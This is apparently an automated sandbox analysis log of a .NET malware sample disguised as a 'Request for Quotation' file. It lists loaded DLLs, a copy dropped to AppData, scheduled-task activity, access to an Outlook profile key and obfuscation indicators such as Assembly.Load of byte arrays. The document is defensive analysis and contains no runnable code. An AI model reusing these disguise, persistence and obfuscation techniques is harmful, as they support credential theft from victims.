Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: rasapi32.dll
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: rasman.dll
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: rtutils.dll
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: secur32.dll
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: schannel.dll
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Section loaded: rasman.dll
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\wbem\WMIADAP.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIADAP.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIADAP.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIADAP.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIADAP.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIADAP.exe Section loaded: loadperf.dll
Source: C:\Windows\System32\wbem\WMIADAP.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
Source: C:\Windows\System32\wbem\WMIADAP.exe File written: C:\Windows\System32\wbem\Performance\WmiApRpl_new.ini
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, InnerForm.cs .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
Source: NuDUTBObHpKADz.exe.0.dr, InnerForm.cs .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.4374c40.1.raw.unpack, l4lWgpboLH3dw1sHJl.cs .Net Code: YO5PyZWuO8 System.Reflection.Assembly.Load(byte[])
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.7ca0000.4.raw.unpack, l4lWgpboLH3dw1sHJl.cs .Net Code: YO5PyZWuO8 System.Reflection.Assembly.Load(byte[])
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 0_2_0153DB84 pushfd ; ret 0_2_0153DB89
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 0_2_07418918 push esp; iretd 0_2_07418919
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 9_2_06DE9241 push es; ret 9_2_06DE9244
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 10_2_0111DB84 pushfd ; ret 10_2_0111DB89
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 10_2_053D0D70 pushfd ; retf 10_2_053D0D7D
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 14_2_0269891E pushad ; iretd 14_2_0269891F
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 14_2_02698C2F pushfd ; iretd 14_2_02698C30
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 14_2_02698DDF push esp; iretd 14_2_02698DE0
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Static PE information: section name: .text entropy: 7.5503065152862066
Source: NuDUTBObHpKADz.exe.0.dr Static PE information: section name: .text entropy: 7.5503065152862066
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.4374c40.1.raw.unpack, jf4Qf9XFgnwgV28YTi.cs High entropy of concatenated method names: 'LU7X6yKwwO', 'ISNXK8UhhP', 'lAnNYVD5mk', 'cITN3tObOJ', 'n5mXVkRMfN', 'uyHXRf6GiT', 'OQGXQHsEOu', 'zVlXeyZ2Pr', 'y5yXSYt5pI', 'N8VXpxKA67'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.4374c40.1.raw.unpack, EXP714sBm2ctecZFQ5.cs High entropy of concatenated method names: 'hTYuvl4xpZ', 'sKtu5ecsIW', 'FqDuAA9oIZ', 'pXLucgpQL6', 'RYNu9usi7e', 'iNru8fEyeF', 'gBQus4m7dM', 'fa9uHwZDnS', 't1cuGvSYmu', 't17uENLuNW'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.4374c40.1.raw.unpack, yNnsJdCNHPcY1XMT4rt.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'XNkmu7q24b', 'gNxmBtjkrZ', 'R1smaTOOob', 'LaLmmZZcrV', 'A2smwgDiCu', 'EOTmfqKLHX', 'LbLmUk5BJV'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.4374c40.1.raw.unpack, l4lWgpboLH3dw1sHJl.cs High entropy of concatenated method names: 'rTwdlcsTgq', 'HyWdoo6g6I', 'yKTdWP9ikF', 'H7xdF0mS7h', 'FYZdg3Wwkf', 'qekdrrnCSx', 'RK9dbyCdGa', 'OLqdh3KEI9', 'JYidObD6cT', 'z7Hd7Ex7S4'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.4374c40.1.raw.unpack, vfkoEZCFRkJoTb50MAj.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'OIiBVwsHY5', 'a7hBRF6Y7C', 't2wBQNBWNV', 'APCBe1RjgL', 'KMrBSL5Ecj', 'O9EBpBC8Zw', 'xcBB05MyWo'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.4374c40.1.raw.unpack, NZGTi0WPFvt2i5LQMG.cs High entropy of concatenated method names: 'ri2y7SFRe', 'nTtLtuH5s', 'UH7jK2aBj', 'EXRkxhCPh', 'On82QQf23', 'usx4Dg4ga', 'sgvU1JgIDJmVl5YaZH', 'BFu7LaGxdjqHuT5R8D', 'mCaNhwp54', 'dyNB0qmvq'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.4374c40.1.raw.unpack, dBMNChvaYpUXNoIXaf.cs High entropy of concatenated method names: 'EYYboTeDi7', 'SwkbFM5Quw', 'rVRbrR03bo', 'NKMrKCAPW4', 'hKlrzIxIYb', 'aRRbY4PAX7', 'EUSb3PLF5i', 'RMHbJP2adb', 'ydmbdDU2jT', 'MIfbPyPB1D'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.4374c40.1.raw.unpack, mjll2lncEU9TxwTknr.cs High entropy of concatenated method names: 'nlyM1yS4VI', 'QiXM2rNf0U', 'sS2MvvqiMQ', 'kB7M5cMXUq', 'G3WMcU8rhr', 'tEIM9IxnHI', 'hmNMsO57WX', 'qH2MH88X4l', 'xRJMExZIy5', 'xwMMVM96J0'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.4374c40.1.raw.unpack, By1IY6fiKcunMsajFa.cs High entropy of concatenated method names: 'Gn0gZsZYa6', 'UjlgkA48Ww', 'sbdFAl4OtR', 'hGmFcv6Anq', 'lNlF9IpO7O', 'zxlF8qP1ns', 'y4yFsbD2ox', 'AXmFH6SISU', 'y5gFGRFD4w', 'SJdFEmoMOL'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.4374c40.1.raw.unpack, YChN0VCCf5YB3QfasmB.cs High entropy of concatenated method names: 'jrDBKbxL56', 'NWmBz3tsCr', 'iBOaYDGYWt', 'bf8a3g8NES', 'gyEaJHsYIt', 'UW0adblTAv', 'DRtaP38MVY', 'B5ZalWiOFD', 'hZOaocUkO7', 'v51aWjGYF2'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.4374c40.1.raw.unpack, gAaOnDG3SbsRr2mZsZ.cs High entropy of concatenated method names: 'Dispose', 'd8J3ISldek', 'gdIJ5YU2vT', 'rBmmiUHWfk', 'v563KI3Q0J', 'SCl3zEgFXl', 'ProcessDialogKey', 'jWqJYqZSjK', 'vyBJ3s2dAV', 'XiPJJEOxB9'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.4374c40.1.raw.unpack, Lv1bZR1o53kqNJhWi9.cs High entropy of concatenated method names: 'I1irl7ttmn', 'OYnrWTXYTC', 'wvSrg7WJae', 'ysfrbfYN8p', 'QVArhCZppW', 'q1WgifatSk', 'gJPgnxHaiU', 'lQngD3LSdm', 'F5yg6d1kfE', 'JLvgIyDFcn'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.4374c40.1.raw.unpack, LF6Z39NPmJiiGMGn5i.cs High entropy of concatenated method names: 'bMf3bTbBrJ', 'KPv3hE4eqS', 'sZu37uYUXL', 'o9N3qOJSUi', 'AOT3xqt3Gv', 'UtQ3tXfwaT', 'zn7O1X9cU5rqgcjeHW', 'Ub9ZHSFh9wtGPVrqic', 'SAT33gW8Ja', 'vF23dbwOJe'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.4374c40.1.raw.unpack, oxcHW9d8Tk42VoYgoA.cs High entropy of concatenated method names: 'ToString', 'vNEtVKu3Uf', 'M6dt5HIixC', 'eXntAxZmZe', 'M9wtcUcIVv', 'Tmit9MLtZX', 'T1pt8AloPu', 'YbltsbiKEQ', 'l6xtHy4Tm8', 'NyMtGBS2Mk'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.4374c40.1.raw.unpack, qhA7Vpw3Pa7m92Y2sb.cs High entropy of concatenated method names: 'dTNWeujeSd', 'iYVWSYhiaU', 'tscWpRbRNj', 'jVfW0hrTja', 'hCEWiwQGhk', 'K81WnWuqof', 'U0QWDf0GSH', 'JjpW6VpIfI', 'JZwWIMiRDM', 'PGJWKfNIFR'
